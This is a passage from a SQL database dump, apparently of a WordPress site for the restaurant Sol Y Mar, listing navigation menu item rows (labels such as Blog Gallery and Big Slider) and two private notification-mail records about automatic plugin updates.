19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2479,NULL,NULL,4499,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2480,NULL,NULL,4500,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2481,NULL,NULL,4501,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2482,NULL,NULL,4502,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2483,NULL,NULL,4503,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2484,NULL,NULL,4504,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2485,NULL,NULL,4505,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2486,NULL,NULL,4506,'post','nav_menu_item',1,0,NULL,NULL,'Blog Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2487,NULL,NULL,4507,'post','nav_menu_item',1,0,NULL,NULL,'Blog Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2587,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-3/','123:99410c849466b1866fd904a3753ab107',4613,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-02 14:16:02','2021-02-02 19:16:02',1,NULL,NULL,NULL,NULL,0,NULL),(2488,NULL,NULL,4508,'post','nav_menu_item',1,0,NULL,NULL,'Blog Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2489,NULL,NULL,4509,'post','nav_menu_item',1,0,NULL,NULL,'Blog Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2490,NULL,NULL,4510,'post','nav_menu_item',1,0,NULL,NULL,'Standard List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2491,NULL,NULL,4511,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2586,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-2/','123:691b8ef035a0bb89ea8438e1e577993d',4612,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-02 00:59:04','2021-02-02 05:59:04',1,NULL,NULL,NULL,NULL,0,NULL),(2492,NULL,NULL,4512,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2493,NULL,NULL,4513,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2494,NULL,NULL,4514,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2495,NULL,NULL,4515,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2496,NULL,NULL,4516,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2497,NULL,NULL,4517,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2498,NULL,NULL,4518,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2499,NULL,NULL,4519,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2500,NULL,NULL,4520,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2501,NULL,NULL,4521,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2502,NULL,NULL,4522,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2503,NULL,NULL,4523,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2504,NULL,NULL,4524,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2505,NULL,NULL,4525,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2506,NULL,NULL,4526,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2507,NULL,NULL,4527,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2508,NULL,NULL,4528,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2509,NULL,NULL,4529,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2510,NULL,NULL,4530,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2511,NULL,NULL,4531,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2512,NULL,NULL,4532,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2513,NULL,NULL,4533,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2514,NULL,NULL,4534,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2515,NULL,NULL,4535,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2516,NULL,NULL,4536,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2517,NULL,NULL,4537,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2518,NULL,NULL,4538,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2519,NULL,NULL,4539,'post','nav_menu_item',1,0,NULL,NULL,'Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2520,NULL,NULL,4540,'post','nav_menu_item',1,0,NULL,NULL,'Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2521,NULL,NULL,4541,'post','nav_menu_item',1,0,NULL,NULL,'Link','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2522,NULL,NULL,4542,'post','nav_menu_item',1,0,NULL,NULL,'Quote','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2523,NULL,NULL,4543,'post','nav_menu_item',1,0,NULL,NULL,'Video','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2524,NULL,NULL,4544,'post','nav_menu_item',1,0,NULL,NULL,'Audio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2525,NULL,NULL,4545,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2526,NULL,NULL,4546,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2527,NULL,NULL,4547,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2528,NULL,NULL,4548,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2529,NULL,NULL,4549,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2530,NULL,NULL,4550,'post','nav_menu_item',1,0,NULL,NULL,'Small Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2531,NULL,NULL,4551,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2532,NULL,NULL,4552,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2533,NULL,NULL,4553,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2534,NULL,NULL,4554,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2535,NULL,NULL,4555,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2536,NULL,NULL,4556,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2537,NULL,NULL,4557,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2538,NULL,NULL,4558,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2539,NULL,NULL,4559,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2540,NULL,NULL,4560,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2541,NULL,NULL,4561,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2542,NULL,NULL,4562,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2543,NULL,NULL,4563,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2544,NULL,NULL,4564,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2545,NULL,NULL,4565,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2546,NULL,NULL,4566,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2547,NULL,NULL,4567,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2548,NULL,NULL,4568,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2549,NULL,NULL,4569,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2550,NULL,NULL,4570,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 